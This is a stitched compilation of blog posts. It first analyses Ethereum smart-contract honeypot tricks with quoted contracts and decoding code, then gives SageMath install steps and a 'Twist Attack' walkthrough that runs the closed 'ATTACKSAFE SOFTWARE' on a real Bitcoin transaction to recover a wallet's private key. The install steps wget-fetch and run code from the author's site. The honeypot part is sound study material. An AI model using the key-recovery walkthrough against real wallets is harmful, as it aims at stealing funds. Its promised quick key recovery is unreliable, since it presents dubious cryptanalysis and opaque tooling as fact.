The first category of smart contract honeypot is based on the way EVM instructions are executed. It is true that the EVM follows an exact set of rules; however, some instructions require very good experience with the way the EVM works to be able to detect the honeypot, otherwise the user could easily be fooled.

The second category of smart contract honeypot is related to the Solidity compiler. In other words, the smart contract honeypot builder should have good experience with smart contract development and a deep understanding of how the Solidity compiler works. For example, the way inheritance is managed by each version of the Solidity compiler, or when overwriting of variables or parameters happens.
The third category of smart contract honeypot is based on hiding things from the users. Most users that try to exploit a program look for the easiest way to do so (quick wins). Therefore, they may not take the time to analyze all parts of the vulnerable smart contract. This behavior leads to the user locking his money in the smart contract.

In this blog post, we are going to discuss 4 techniques used by deployers to hide an internal behavior from the users and therefore fool the user.

EVM based smart contract honeypots

The EVM-based smart contract honeypots have only one subtype, called balance disorder. I think the best way to understand how this type of smart contract honeypot works is by example. So take a look at the following example:

This example is taken from the following contract: https://etherscan.io/address/0x8b3e6e910dfd6b406f9f15962b3656e799f60d2b#code

From a quick look at this function, a user can easily conclude that if, while calling this function, he sends more than the contract balance actually holds, then everything in the contract plus what he sends will be sent back to him. Which is obviously a good deal.

However, what a user could miss in this quick analysis of the smart contract is that the contract balance is incremented as soon as the user's call to the function is performed. This means that msg.value will always be lower than the contract balance no matter what you do. Therefore, the condition will never be true and the ether will be locked in this contract.

Another example of the balance disorder type of honeypot can be found here: https://etherscan.io/address/0xf2cf114be39a48aa2321ed39c1f132da0c51e453

By visiting this link you can see that there is no source code there. So there are two ways to analyze this contract. The first one, and the most difficult, is to get the bytecode of this smart contract and then try to understand and reverse engineer it.
Or the second way is to try to decompile it, using one of the different tools available, to get an intermediate and easy-to-understand source code. I personally used the second technique to accelerate the analysis and simply used the Etherscan default decompiler. In the smart contract you want to decompile you can click here:

And wait for a moment, about 30 seconds, to get the source code.

By taking a look at the source code, and especially at the “multiplicate” function, you can now easily see the same logic as in the previously explained example. The condition in line 24 will never be satisfied and the money will be stuck in the contract.

Solidity compiler-based smart contract honeypots

As I said, this category of smart contract honeypots is based on some deep knowledge about how the Solidity compiler works. In the following subsection, I will give you 4 techniques that are used to build this kind of smart contract honeypot. However, other unknown techniques might be used in the wild, and I will do my best to update this blog post whenever I find a new one. Please comment below and tell me if you know a technique that was not noted in this blog post.

Inheritance Disorder technique

One of the most confusing systems in the Solidity language, or even in other programming languages, is inheritance. A lot of hidden aspects of this concept could be used by a deployer to fool the users and make the contract work contrary to what is expected.

In the Solidity language, a smart contract can implement the inheritance concept by using the word “is” followed by the different smart contracts whose source code this one wants to inherit. Then only one smart contract is created and the source code from the other contracts is copied into it.
To better understand how such a mechanism could be exploited to create honeypots, please take a look at the following examples:

Example1:

You can find this contract here: https://etherscan.io/address/0xd3bd3c8fb11429b0deee5301e72b66fba29782c0#code

If you take a look at this contract's source code, you can easily notice that it has an obvious vulnerability related to access control. The function setup allows a user to change the owner of this contract without checking if he is the actual owner. Therefore, the user would be able to execute the withdraw function to get the money.

However, this analysis assumes that the isOwner() function inherited from the Ownable contract is going to check the local variable Owner. Unfortunately, this is not what will actually happen. The inheritance creates a different variable for each contract even if they have the same name. The variable Ownable.Owner is totally different from ICO.Owner. Therefore, when the user calls the setup() function, it will change the value of ICO.Owner and not Ownable.Owner. This means that the result of isOwner() will remain the same.

Example2

Another example of this same type of Solidity compiler-based honeypot can be found here. The same logic applies to this smart contract. The Owner variable will not change by calling the setup() function.

Skip Empty String Literal

Another tricky behavior in the Solidity compiler that may not be very easy to discover is the skip empty string literal. The skip empty string literal problem happens in Solidity when a function is called with an empty string as a parameter. This is a known bug in Solidity compilers before 0.4.13; here is a reference for it.

The encoder skips the empty string literal “” when used as a parameter in a function call. As a result, the encoding of all subsequent arguments is moved left by 32 bytes, causing the function call data to be malformed.
This kind of honeypot could be easily detected by just looking at the Solidity compiler version and then scrolling down the source code to see if there is any use of the empty string in a function call. However, knowledge of this bug is required to detect the problem in the smart contract.

Here is a simple example of this honeypot. Check the following smart contract: https://etherscan.io/address/0x2b990227344300aded3a072b3bfb9878b209da0a#code

The source code is a little bit long so I will put just the most important functions:

In the divest() function, line 83, the external function call to loggedTransfer() with the empty string will result in shifting the parameters by 32 bytes, which leads to replacing the target address msg.sender with the owner address. Therefore, the user will send the money to the owner of the contract and not to his own address. This simply means that the user will never be able to retrieve the money he sent to this smart contract.

Type Deduction Overflow

The Solidity compiler offers a nice feature that helps developers declare a variable without knowing exactly what type it would be. This is done by creating a variable with the keyword “var”, and the compiler will deduce what type is best for that result.

However, this technique may cause a problem called type deduction overflow. This problem could be used in a smart contract honeypot to cause a revert and then lock the money in the contract. To better illustrate this problem please take a look at the following source code:

You can check the whole code here: https://etherscan.io/address/0x48493465a6a2d8db8616a3c7288a9f81d54a8835#code

In this contract the Double() function allows a user to double his money by first sending more than one ether and then looping to build up the value of the ethers that will be sent to the user. This seems to be a nice and easy smart contract to exploit. However, this contract's loop will never reach even half of the value sent by the user.
The reason behind this is the way the variable “i” is declared. The “var” keyword will create a variable of type uint8 because of the 0 value assigned to it at the beginning. The code should loop until it gets to msg.value, which is a uint256 whose value would be more than a 1 followed by 18 digits. However, the “i” variable can only reach 255 and, once incremented, gets back to 0. Therefore, the loop will end and all that the user will receive is 255 wei.

Uninitialized Struct

The uninitialized structure is a common problem in Solidity and could be seen both as a vulnerability and as a way to trick users. In this blog post, I am going to discuss the tricky part of this problem. However, if you want me to discuss how this could be a vulnerability, please comment below and I will be happy to make a blog post about it.

An uninitialized structure problem happens when a structure variable is not initialized at the moment of its creation. When a structure variable is not initialized in the same line as its creation with the keyword “new”, the Solidity compiler points that variable to the first slot of the smart contract. This simply means the variable will be pointing to the first variable of the smart contract.

Once the developer starts assigning values to the structure variable, the first element value of the structure will overwrite the first variable value. This concept is used by smart contract honeypot deployers to trick users into sending money to exploit an obvious vulnerability in the contract. Here is an example of such a honeypot: https://etherscan.io/address/0x29ed301f073f62acc13a2d3df64db4a3185f1433#code

This contract asks the user to guess a number while betting some of his money. The secret value that a user is going to guess is stored in the first slot of the smart contract. From a quick analysis of this contract, the user would assume that the contract is vulnerable, as even private variables can be seen in the Blockchain.
However, once the user calls the play() function and sends money to it, the function will create a structure “game” in line 51 without correctly initializing it. This means that this structure variable will point to the first slot (variable secretNumber). In addition, game.player will be the variable that overwrites the secretNumber variable. Therefore, the user will not be able to correctly guess the number.

Actually, in this example, the honeypot could be bypassed to retrieve the money. If you take a look at the value assigned to the game.player variable that overwrites secretNumber, you will see that it is simply the sender’s address. Therefore, the value the user should send is simply his address converted to decimal.

Etherscan based smart contract honeypots

All the smart contracts that we have seen until now exploit a gap in the user's knowledge of the Solidity language. However, in this section of this blog post, the deployer exploits some features of the Etherscan platform to hide important information, which may trick users.

Hidden State Update

The Etherscan platform helps developers and any Ethereum Blockchain user to debug smart contracts or track transactions. Therefore, the platform displays users’ transactions and the internal messages that are performed by smart contracts. However, one of the features of Etherscan is that it does not show internal messages with an empty value. Therefore, smart contract honeypot deployers exploit this feature to trick users and change the smart contract behavior.

Here is an example to better understand this concept. Check the following smart contract: https://etherscan.io/address/0x8bbf2d91e3c601df2c71c4ee98e87351922f8aa7#code

This contract might be used as a honeypot, as the user could be fooled by the initial value of the variable passHasBeenSet. By checking the Etherscan data he would not be able to see any transaction that has changed the value of passHasBeenSet.
Therefore, he would assume that the value didn’t change and attempt to exploit the contract. To do that, the user would try to exploit the contract by sending more than one ether to the contract using GetGift() after setting the hashPass using the SetPass() function. However, the passHasBeenSet variable might already have been changed by another contract, and that would not be seen in the Etherscan platform.

Straw Man Contract

This technique is built upon showing source code for a contract that is not actually the one used by the contract. For example, the deployer could build a contract that requires another library, where the library address is initialized during the deployment of the contract or by calling a specific function. At this stage, there is nothing that stops the deployer from using another contract address that is totally different from the one whose source code is displayed in Etherscan.

Unfortunately, this is really a tricky honeypot and a really difficult technique for a user to discover. I mean the user should verify the addresses of the deployed contract and the different transactions and data passed to the contract to be able to find this issue.

Moreover, even if the user tries to test this smart contract in a different contract, he will use the smart contract code displayed by the attacker and he will see normal behavior. Which makes it even more difficult to find the issue.

Here is an example of such a honeypot; try to take a look at it and see what makes this smart contract a honeypot: https://etherscan.io/address/0xdc5c87ba250b65a83042333f1101940b74312a65#code

Etherscan is an Ethereum blockchain explorer that, besides other features, allows developers to submit the code of the smart contracts they deploy. The main benefit of this feature is that it allows users to check what contracts do by reading their source code. Etherscan makes sure that the code matches the smart contract as deployed. The list of verified contracts is long.
As of this writing, Etherscan offers the source code for 26055 contracts, which can be browsed here. On a lazy Sunday afternoon I decided to casually browse it to see what kind of contracts people were running and get a sense of what people use the blockchain for, and how well written and secure these contracts are. Most contracts I found implemented tokens, crowdsales, multi-signature wallets, ponzis, and.. honeypots!

Honeypot contracts are the most interesting findings to me. Such contracts hold ether, and pretend to do so insecurely. In short, they are scam contracts that try to fool you into thinking you can steal the ether they hold, while in fact all you can do is lose ether. A common pattern they follow is, in order to retrieve the ether they hold, you must send them some ether of your own first. Of course, if you try that, you’re in for a nasty surprise: the smart contract eats up your ether, and you find out that the smart contract does not do what you thought it did.

In this post I will analyze a couple of honeypot contracts I came across, and explain what they seem to do, and what they really do.

The not-really-insecure non-lottery

The first contract I will go through implements a lottery that, apparently, is horribly insecure and easy to steal from with a guaranteed win. I have come across several of these. The last instance I found is deployed at address 0x8685631276cfcf17a973d92f6dc11645e5158c0c, and its source code can be read here. I am copying the code below for convenience. Can you spot the bait? Can you tell why, if you try to exploit it, you will actually lose ether?

    pragma solidity ^0.4.23;

    // CryptoRoulette
    //
    // Guess the number secretly stored in the blockchain and win the whole contract balance!
    // A new number is randomly chosen after each try.
    //
    // To play, call the play() method with the guessed number (1-16).
    // Bet price: 0.2 ether

    contract CryptoRoulette {

        uint256 private secretNumber;
        uint256 public lastPlayed;
        uint256 public betPrice = 0.001 ether;
        address public ownerAddr;

        struct Game {
            address player;
            uint256 number;
        }
        Game[] public gamesPlayed;

        constructor() public {
            ownerAddr = msg.sender;
            shuffle();
        }

        function shuffle() internal {
            // randomly set secretNumber with a value between 1 and 10
            secretNumber = 6;
        }

        function play(uint256 number) payable public {
            require(msg.value >= betPrice && number <= 10);

            Game game;
            game.player = msg.sender;
            game.number = number;
            gamesPlayed.push(game);

            if (number == secretNumber) {
                // win!
                msg.sender.transfer(this.balance);
            }

            //shuffle();
            lastPlayed = now;
        }

        function kill() public {
            if (msg.sender == ownerAddr && now > lastPlayed + 6 hours) {
                suicide(msg.sender);
            }
        }

        function() public payable { }
    }

It’s easy to tell that the shuffle() method sets secretNumber to 6. Hence, if you call play(6) and send it 0.001 ether, you will always win your ether plus whatever the balance of the contract is, namely 0.015 ether. Easy money, right? Wrong.

What’s the trick? Look closely at how play() is implemented. It declares a variable Game game, but does not initialize it. It will therefore default to a pointer to slot zero of the contract’s storage space. Then, it stores your address in its first member, storage slot 0, and the submitted number in the second one, which maps to storage slot 1. So, in practice, this will end up overwriting the contract’s secretNumber with the attacker account’s address, and lastPlayed with the number submitted.

Then, it will compare secretNumber, which is now your account’s address, with the number you submitted. Since you can only submit numbers no greater than 10, you can only win if your account’s address is within the range 0x0 to 0x0a. (Don’t bother trying to bruteforce-search for one account in that small range! Simply unfeasible.) So, the comparison will fail, and the contract will keep your ether.
Of course, the attacker can at any time call kill() to retrieve the ether.

The not-really-insecure non-riddle

This is another fun one. It had me scratching my head for a while. However, there is a huge giveaway that the contract is up to something nasty right away. But let’s not get ahead of ourselves. Here is its code. Can you spot the supposed vulnerability? And, can you tell why an exploit won’t work? And what is the giveaway I was talking about?

    contract G_GAME
    {
        function Play(string _response) external payable {
            require(msg.sender == tx.origin);
            if(responseHash == keccak256(_response) && msg.value>1 ether) {
                msg.sender.transfer(this.balance);
            }
        }

        string public question;
        address questionSender;
        bytes32 responseHash;

        function StartGame(string _question,string _response) public payable {
            if(responseHash==0x0) {
                responseHash = keccak256(_response);
                question = _question;
                questionSender = msg.sender;
            }
        }

        function StopGame() public payable {
            require(msg.sender==questionSender);
            msg.sender.transfer(this.balance);
        }

        function NewQuestion(string _question, bytes32 _responseHash) public payable {
            require(msg.sender==questionSender);
            question = _question;
            responseHash = _responseHash;
        }

        function() public payable{}
    }

The code supposedly implements a riddle. It sets up a question, and, if you can tell what the answer is, it will presumably send you its balance, currently a little more than 1 ether. Of course, to produce an answer, you must send an ether first, which you will get back if you are correct.

The code seems fine, but there is a dirty trick: notice how NewQuestion allows questionSender to submit a hash that does not match _question. So, as long as this function isn’t used, we should be alright. Can we tell what the question and answer are?

If you read the transaction history of the contract on etherscan, it appears that the 2nd transaction sets up the question. It’s even more obvious if you click the “Convert to UTF8” button on etherscan.
This reveals the question “I am very easy to get into,but it is hard to get out of me. What am I?”, and the answer “TroublE”.

Since this transaction is called, according to etherscan, after the creation of the contract, responseHash is going to be zero, and will become keccak256("TroublE"). Then, there is a third transaction that loads up one ether in the contract.

So, apparently, we could call Play("TroublE") and send one ether to get two ether back. Too good to be true? Probably. Let’s make sure.

We can make sure we will win the contract’s ether by inspecting the state of the smart contract. Its variables are not public, but still all it takes is just a few extra strokes to retrieve their values by querying the blockchain.

questionSender and responseHash are the 2nd and 3rd variables, so they will occupy slots 1 and 2 on the storage space of the smart contract. Let’s retrieve their values.

    web3.eth.getStorageAt('0x3caf97b4d97276d75185aaf1dcf3a2a8755afe27', 1, console.log);

The result is `0x0..0765951ab946f3a6f0379680a6b05fb807d52ba09`. That spells trouble (pun intended) for an attacker, since the transaction setting up the question came from an account starting with 0x21d2. Something’s up.

    web3.eth.getStorageAt('0x3caf97b4d97276d75185aaf1dcf3a2a8755afe27', 2, console.log);

The result is `0xc3fa7df9bf24…`. Is this the hash of “TroublE”?

    web3.sha3('TroublE');

That call returns 0x92a930d5..., so it turns out that, if we were to call Play("TroublE") and send 1 ether, we’d actually lose it. But how is it possible that the hashes do not match?

Notice how StartGame does nothing if responseHash is already set. Clearly, that second transaction did not alter the state of the contract, so it must have already been set before this transaction. But how is it possible that responseHash was already initialized, if that was the first transaction after the creation of the contract?
After some serious head scratching, I found a recent interesting post on honeypot contracts that explains that Etherscan does not show transactions between contracts when msg.value is zero. Other blockchain explorers such as Etherchain do show them. Surely enough, etherchain reveals a couple of additional transactions in the contract’s history, where a contract at 0x765951.. modifies responseHash via zero-value transactions. So let’s check these transactions; perhaps the ether can still be stolen?

To track what happened, we need to decode these calls. We can get the contract’s ABI from Etherscan, and the internal transaction data from the “parity traces” of Etherchain (first, second). That’s all we need to decode the transactions into human readable format.

    const abiDecoder = require('abi-decoder');
    const Web3 = require('web3');
    const web3 = new Web3();

    const abi = [
      {"constant":false,"inputs":[{"name":"_question","type":"string"},{"name":"_response","type":"string"}],"name":"StartGame","outputs":[],"payable":true,"stateMutability":"payable","type":"function"},
      {"constant":false,"inputs":[{"name":"_question","type":"string"},{"name":"_responseHash","type":"bytes32"}],"name":"NewQuestion","outputs":[],"payable":true,"stateMutability":"payable","type":"function"},
      {"constant":true,"inputs":[],"name":"question","outputs":[{"name":"","type":"string"}],"payable":false,"stateMutability":"view","type":"function"},
      {"constant":false,"inputs":[{"name":"_response","type":"string"}],"name":"Play","outputs":[],"payable":true,"stateMutability":"payable","type":"function"},
      {"constant":false,"inputs":[],"name":"StopGame","outputs":[],"payable":true,"stateMutability":"payable","type":"function"},
      {"payable":true,"stateMutability":"payable","type":"fallback"}
    ];

    // Call data of the first trace (the StartGame call).
    const data1 = '…';
    // Call data of the second trace (the NewQuestion call).
    const data2 = '0x3e3ee8590000000000000000000000000000000000000000000000000000000000000040c3fa7df9bf247d144f6933776e672e599a5ed406cd0a15a9f2da09055b8f906700000000000000000000000000000000000000000000000000000000000000464920616d2076657279206561737920746f2067657420696e746f2c627574206974206973206861726420746f20676574206f7574206f66206d652e205768617420616d20493f0000000000000000000000000000000000000000000000000000';

    abiDecoder.addABI(abi);
    console.log(abiDecoder.decodeMethod(data1));
    console.log(abiDecoder.decodeMethod(data2));

Running this code, we get the following result:

    { name: 'StartGame',
      params:
       [ { name: '_question',
           value: 'I am very easy to get into,but it is hard to get out of me. What am I?',
           type: 'string' },
         { name: '_response', value: 'TroublE', type: 'string' } ] }
    { name: 'NewQuestion',
      params:
       [ { name: '_question',
           value: 'I am very easy to get into,but it is hard to get out of me. What am I?',
           type: 'string' },
         { name: '_responseHash',
           value: '0xc3fa7df9bf247d144f6933776e672e599a5ed406cd0a15a9f2da09055b8f9067',
           type: 'bytes32' } ] }

We learn that the first transaction sets the answer to keccak256("TroublE"), but the second one sets the answer to a hash value for which we don’t know the original data! Again it’s quite easy to miss that the second call does not use _question to compute the hash; instead, it’s set to an arbitrary value that does not match the string provided in the previous call, although the question does match.

So, unless we can find out a value that produces the given hash, possibly via a dictionary attack or a bruteforce search, we’re out of luck. And, given how sophisticated this honeypot is, I would assume trying to bruteforce the hash is not going to work out very well for us.

Unraveling this honeypot took quite some effort. Its creator is ultimately counting on attackers trusting the etherscan data, which does not contain the full picture.

The giveaway

I said this contract contains a dead giveaway that its creator is playing tricks.
This is in this line:

    require(msg.sender == tx.origin);

What this line achieves is, it prevents contracts from calling Play. This is because tx.origin is always an “external account”, and never a smart contract. Why is this useful for the attacker? A way to safely attack a contract is to call it from an “attack contract” that reverts execution if it didn’t gain ether from the attack:

    function attack() {
        uint initialBalance = this.balance;
        attack_contract();
        require (this.balance > initialBalance);
    }

This way, unless the attacker’s contract’s balance increases, the transaction fails altogether. The creator of the honeypot wants to prevent an attacker from using this trick to protect themselves.

Literature:

ETHEREUM: A SECURE DECENTRALISED GENERALISED TRANSACTION LEDGER, BERLIN VERSION beacfbd – 2022-10-24, DR. GAVIN WOOD, FOUNDER, ETHEREUM & PARITY
From Smart to Secure Contracts: Automated Security Assessment and Improvement of Ethereum Smart Contracts, Christof Ferreira Torres
The Art of The Scam: Demystifying Honeypots in Ethereum Smart Contracts, Christof Ferreira Torres, Mathis Steichen, and Radu State, University of Luxembourg
A survey of attacks on Ethereum smart contracts, Nicola Atzei, Massimo Bartoletti, and Tiziana Cimoli

Conclusion

Honeypots are a moral grey area for me. Is it OK to scam those who are looking to steal from contracts? I don’t think so. But I do not feel very strongly about this. In the end, if you got scammed, it is because you were searching for smart contracts to steal from to begin with.

These scams play on the greed of people who are smart enough to figure out an apparent vulnerability in a contract, yet not knowledgeable enough to figure out what the underlying trap is.

If you want to get deeper into Smart Contract security, check this amazing wargame called Capture the Ether. It’s a fun way to hone your skills and train your eye for suspicious Solidity code.
GitHub
Telegram: https://t.me/cryptodeeptech
Video: https://youtu.be/UrkOGyuuepE
Source: https://cryptodeep.ru/solidity-vulnerable-honeypots
Cryptanalysis
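Added example, not part of the original post: a Python decoder that walks the head/tail layout of the quoted `data2` by hand, which is one way to confirm what a call really set when the explorer view is incomplete and no ABI file is at hand. The names `decode_call` and `encode_call` and the `0x00000000` selector on the constructed `StartGame`-shaped sample are assumptions for illustration.

```python
"""Hand decoding of the ABI call data quoted in the post (added example)."""

WORD = 32  # every ABI head slot and length field is one 32-byte word

QUESTION = "I am very easy to get into,but it is hard to get out of me. What am I?"
RESPONSE_HASH = "0xc3fa7df9bf247d144f6933776e672e599a5ed406cd0a15a9f2da09055b8f9067"

# The post's `data2`, written out word by word.
DATA2 = "0x" + "".join([
    "3e3ee859",                    # selector (the post decodes it as NewQuestion)
    "00" * 31 + "40",              # head 0: offset of the string inside the arguments
    RESPONSE_HASH[2:],             # head 1: bytes32 is static, so it is stored inline
    "00" * 31 + "46",              # tail: string length, 0x46 = 70 bytes
    "4920616d2076657279206561737920746f2067657420696e746f2c6275742069",
    "74206973206861726420746f20676574206f7574206f66206d652e2057686174",
    "20616d20493f" + "00" * 26,    # last 6 bytes, zero-padded to a full word
])


def _slot(buf, pos):
    """Return the 32-byte word at pos, refusing to read past the buffer."""
    if pos + WORD > len(buf):
        raise ValueError(f"call data truncated at byte {pos}")
    return buf[pos:pos + WORD]


def decode_call(calldata_hex, types):
    """Decode selector ++ abi.encode(...) for arguments of type string or bytes32."""
    hex_part = calldata_hex[2:] if calldata_hex.startswith("0x") else calldata_hex
    raw = bytes.fromhex(hex_part)
    if len(raw) < 4:
        raise ValueError("missing 4-byte selector")
    selector, args = raw[:4], raw[4:]
    values = []
    for i, typ in enumerate(types):
        head = _slot(args, i * WORD)
        if typ == "bytes32":        # static type: the value sits in the head slot
            values.append("0x" + head.hex())
        elif typ == "string":       # dynamic type: the head slot holds an offset
            offset = int.from_bytes(head, "big")
            length = int.from_bytes(_slot(args, offset), "big")
            start = offset + WORD
            if start + length > len(args):
                raise ValueError("string runs past the end of the call data")
            values.append(args[start:start + length].decode("utf-8"))
        else:
            raise ValueError(f"unsupported type: {typ}")
    return "0x" + selector.hex(), values


def encode_call(selector_hex, types, values):
    """Inverse of decode_call; used here to build a constructed sample."""
    head, tail = b"", b""
    head_size = WORD * len(types)
    for typ, val in zip(types, values):
        if typ == "bytes32":
            word = bytes.fromhex(val[2:])
            if len(word) != WORD:
                raise ValueError("bytes32 value must be exactly 32 bytes")
            head += word
        elif typ == "string":
            data = val.encode("utf-8")
            head += (head_size + len(tail)).to_bytes(WORD, "big")
            tail += len(data).to_bytes(WORD, "big") + data + b"\x00" * (-len(data) % WORD)
        else:
            raise ValueError(f"unsupported type: {typ}")
    return selector_hex + (head + tail).hex()


if __name__ == "__main__":
    # Constructed sample shaped like the first call (string, string); the
    # selector is a placeholder because the original data1 is not reproduced here.
    start_game = encode_call("0x00000000", ["string", "string"], [QUESTION, "TroublE"])
    print(decode_call(start_game, ["string", "string"]))   # answer visible as text
    print(decode_call(DATA2, ["string", "bytes32"]))       # only a digest is visible
```

The second decode shows why reading the first call alone is misleading: the later call carries a ready-made 32-byte digest, so no plaintext answer appears anywhere in its input.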
  12. CryptoDeepTech

    Installing SageMath in Google Colab

    CRYPTO DEEP TECH

    In this article we will do a fresh installation of SageMath in Google Colab. We previously published the article “Install SageMath for cryptanalysis on Fedora 64bit(10GB) Cloud Virtual Server”, but to continue cryptanalysis of the Bitcoin blockchain many of our readers prefer Debian and Ubuntu over Fedora. As we know, Google Colab has been updated to "Ubuntu 20.04.5 LTS".

        !cat /etc/lsb-release

    Because of this, "Ubuntu 20.04.5 LTS" lets us install only SageMath version 9.0, Release Date: 2020-01-01, using the standard installation command:

        !sudo apt-get install -y sagemath-common

    To carry out full cryptanalysis, we will install the much newer SageMath version 9.3 in Google Colab.

    We have published the file Install_SageMath_in_Google_Colab.ipynb on GitHub.

    Go to the official site: https://colab.research.google.com

    Now use the wget utility to download the tar file sage-9.3-Ubuntu_20.04-x86_64.tar.bz2:

        !wget https://cryptodeeptech.ru/sage-9.3-Ubuntu_20.04-x86_64.tar.bz2
        !tar -xf sage-9.3-Ubuntu_20.04-x86_64.tar.bz2
        cd SageMath/
        !python3 relocate-once.py

    All done!

        !./sage -sh
        sage -v

    That's right! We got the new version: SageMath version 9.3, Release Date: 2021-05-09

        wget https://raw.githubusercontent.com/demining/CryptoDeepTools/bbd83042e7405508cd2e646ad1b0819da0f9c58d/18TwistAttack/discrete.py

    Now, to obtain the private key, all that remains is to run the command:

        python3 discrete.py

    Sage Math 9.3 will solve the discrete logarithm problem (Pollard's rho algorithm for logarithms).

    Now everything works as it should!

    Source code
    Telegram: https://t.me/cryptodeeptech
    Video: https://youtu.be/DBu0UnVe0ig
    Source: https://cryptodeep.ru/install-sagemath-in-google-colab
    Cryptanalysis
  13. In this article we will show in detail, with slides, how to install “SageMath” on a Fedora 30 64bit(10GB) cloud virtual server; as an example we will use the servers of “DIGITAL RUBLE TECH”. Previously we used the Google Colab cloud service to install “SageMath”, but unfortunately, because of the latest updates, not all components for cryptanalysis of the Bitcoin blockchain work properly.

    Registration:

        cat /etc/redhat-release
        dnf check-update
        dnf install python3
        dnf install sagemath
        sage -v
        git clone https://github.com/demining/CryptoDeepTools.git
        cd CryptoDeepTools/18TwistAttack/
        ls

    To solve the discrete logarithm (Pollard's rho algorithm for logarithms), run the Python script discrete.py

    Run command:

        sage -python3 discrete.py

    Sage Math solved the discrete logarithm problem (Pollard's rho algorithm for logarithms).

    Now everything works as it should!

    Source code
    DIGITAL RUBLE TECH
    Telegram: https://t.me/cryptodeeptech
    Video: https://youtu.be/xHnTDRgZwvE
    Source: https://cryptodeep.ru/install-sagemath-on-fedora
    Cryptanalysis
  14. CRYPTO DEEP TECH

    In this article we will implement a Twist Attack using example No. 2. According to the first, theoretical part of the article, we made sure that with the help of certain points on the secp256k1 elliptic curve we can obtain partial values of the private key and, within 5-15 minutes, restore a Bitcoin wallet using the “Sagemath pollard rho function: (discrete_log_rho)” and the “Chinese Remainder Theorem”.

    https://github.com/christianlundkvist/blog/blob/master/2020_05_26_secp256k1_twist_attacks/secp256k1_twist_attacks.md

    According to a tweet by Paulo Barreto: https://twitter.com/pbarreto/status/825703772382908416?s=21

        The cofactor is 3^2*13^2*3319*22639

        E1: 20412485227
        E2: 3319, 22639
        E3: 109903, 12977017, 383229727
        E4: 18979
        E6: 10903, 5290657, 10833080827, 22921299619447

        prod = 20412485227 * 3319 * 22639 *109903 * 12977017 * 383229727 * 18979 * 10903 * 5290657 * 10833080827 * 22921299619447

        38597363079105398474523661669562635951234135017402074565436668291433169282997 = 3 * 13^2 * 3319 * 22639 * 1013176677300131846900870239606035638738100997248092069256697437031

        HEX:0x55555555555555555555555555555555C1C5B65DC59275416AB9E07B0FEDE7B5

        E1: y^2 = x^3 + 1
        E2: y^2 = x^3 + 2
        E3: y^2 = x^3 + 3
        E4: y^2 = x^3 + 4
        E6: y^2 = x^3 + 6

    https://attacksafe.ru/twist-attack-on-bitcoin

    y² = x³ + ax + b. In the Koblitz curve, y² = x³ + 0x + 7. In the Koblitz curve, 0 = x³ + 0 + 7 b '= -x ^ 3 - ax.

    Let's move on to the experimental part:

    (Consider the Bitcoin address)

    (Now consider the critically vulnerable transactions)

    Open [TerminalGoogleColab].
    We implement the Twist Attack algorithm using our repository 18TwistAttack

        git clone https://github.com/demining/CryptoDeepTools.git
        cd CryptoDeepTools/18TwistAttack/
        ls

    Install all the packages we need from requirements.txt

        sudo apt install python2-minimal
        wget https://bootstrap.pypa.io/pip/2.7/get-pip.py
        sudo python2 get-pip.py
        pip2 install -r requirements.txt

    Prepare the RawTX for the attack

        RawTX = 01000000013edba424d1b614ec2182c8ac6856215afb803bcb9748c1888eecd35fffad67730e0000006b483045022100bbabd1cb2097e0053b3da453b15fd195a2bc1e8dbe00cfd60aee95b404d2abfa02201af66956a7ea158d32b0a56a46a83fe27f9e544387c8d0ce13cd2a54dba9a747012102912cd095d2c20e4fbdb20a8710971dd040a067dba45899b7156e9347efc20312ffffffff01a8020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000

    Save it in the file: RawTX.txt

    To carry out the attack we will use the “ATTACKSAFE SOFTWARE” software

    www.attacksafe.ru/software

    Access permissions:

        chmod +x attacksafe

    Usage:

        ./attacksafe -help

          -version: software version
          -list: list of bitcoin attacks
          -tool: indicate the attack
          -gpu: enable gpu
          -time: work timeout
          -server: server mode
          -port: server port
          -open: open file
          -save: save file
          -search: vulnerability search
          -stop: stop at mode
          -max: maximum quantity in mode
          -min: minimum quantity per mode
          -speed: boost speed for mode
          -range: specific range
          -crack: crack mode
          -field: starting field
          -point: starting point
          -inject: injection regimen
          -decode: decoding mode

        ./attacksafe -version

        Version 5.3.2. [ATTACKSAFE SOFTWARE, © 2023]

    "ATTACKSAFE SOFTWARE" includes all popular attacks on Bitcoin.
    Let's list all the attacks:

        ./attacksafe -list

    Choose -tool: twist_attack

    To obtain certain secp256k1 points from the vulnerable ECDSA signature transaction, we added the RawTX data to a text document and saved it as the file RawTX.txt

        01000000013edba424d1b614ec2182c8ac6856215afb803bcb9748c1888eecd35fffad67730e0000006b483045022100bbabd1cb2097e0053b3da453b15fd195a2bc1e8dbe00cfd60aee95b404d2abfa02201af66956a7ea158d32b0a56a46a83fe27f9e544387c8d0ce13cd2a54dba9a747012102912cd095d2c20e4fbdb20a8710971dd040a067dba45899b7156e9347efc20312ffffffff01a8020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000

    Run -tool twist_attack using the “ATTACKSAFE SOFTWARE” software

        ./attacksafe -tool twist_attack -open RawTX.txt -save SecretPoints.txt

    We ran this attack from -tool twist_attack and the result was saved to the file SecretPoints.txt

    Now, to see the successful result, open the file SecretPoints.txt

        cat SecretPoints.txt

    Result:

        Elliptic Curve Secret Points:

        Q11 = E1([97072073026593516785986136148833105674452542501015145216961054272876839453879, 107567253371779495307521678088935176637661904239924771700494716430774957820966])
        Q21 = E2([3350296768277877304391506547616361976369787138559008027651808311357100316617, 72988900267653266243491077449097157591503403928437340215197819240911749073070])
        Q22 = E2([112520741232779465095566100761481226712887911875949213866586208031790667764851, 67821409607391406974451792678186486803604797717916857589728259410989018828088])
        Q31 = E3([19221018445349571002768878066568778104356611670224206148889744255553888839368, 51911948202474460182474729837629287426170495064721963100930541018009108314113])
        Q32 = E3([41890177480111283990531243647299980511217563319657594412233172058507418746086, 50666391602993122126388747247624601309616370399604218474818855509093287774278])
        Q33 = E3([42268931450354181048145324837791859216268206183479474730830244807012122440868, 106203099208900270966718494579849900683595613889332211248945862977592813439569])
        Q41 = E4([54499795016623216633513895020095562919782606390420118477101689814601700532150, 105485166437855743326869509276555834707863666622073705127774354124823038313021])
        Q61 = E6([62124953527279820718051689027867102514830975577976669973362563656149003510557, 100989088237897158673340534473118617341737987866593944452056172771683426720481])
        Q62 = E6([86907281605062616221251901813989896824116536666883529138776205878798949076805, 19984923138198085750026187300638434023309806045826685297245727280111269894421])
        Q63 = E6([66063410534588649374156935204077330523666149907425414249132071271750455781006, 25315648259518110320341360730017389015499807179224601293064633820188666088920])
